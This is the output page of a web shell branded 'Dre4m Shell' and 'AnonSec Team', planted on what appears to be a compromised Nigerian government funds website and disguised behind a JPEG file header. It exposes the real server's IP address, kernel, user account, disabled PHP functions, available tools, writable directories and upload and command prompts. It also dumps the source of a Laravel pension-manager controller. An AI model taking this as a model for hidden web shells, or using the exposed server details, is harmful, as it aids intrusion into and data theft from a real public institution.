ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.117.94.0
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/app/Http/Controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/app/Http/Controllers/PensionManagerController.php
<?php

namespace App\Http\Controllers;
use Session;
use Illuminate\Http\Request;
use App\Http\Requests;
use App\Http\Controllers;
use Auth;
use DB;

class PensionManagerController extends ParentController
{
   public function __construct(Request $request)
    {
        $this->division    = $request->session()->get('division');
        $this->divisionID  = $request->session()->get('divisionID');
    }  

   /* public function index()
    {
        $data['getAllPFA'] = DB::table('tblpension_manager')->where('active', 1)->get();
        return view('pensionManager.create');
    }

    
    public function store(Request $request)
    {
        $this->validate($request, 
        [
            'pensionmgr'          => 'required|string',            
        ]);
        $mgr                      = trim($request['pensionmgr']);
        $date                     = date("Y-m-d H:s:i");
        DB::table('tblpension_manager')->insert(array( 
            'pensionManager'      => $mgr, 
            'created_at'          => $date,
            'updated_at'          => $date,
        ));
        $this->addLog('New Pension Manager Added and division: '. $this->division);
        return redirect('/pensionmanager/create')->with('msg', 'Operation was done successfully.');
                
    }

    
    public function viewmanager()
    {
        $data['show'] = DB::table('tblpension_manager')->get();
        return view('pensionmanager/list',$data);
    }*/

   
    public function edit($id)
    {
        //
    }

    
    public function update(Request $request, $id)
    {
        //
    }

    
    public function destroy($id)
    {
        //
    }
}

Anon7 - 2022
AnonSec Team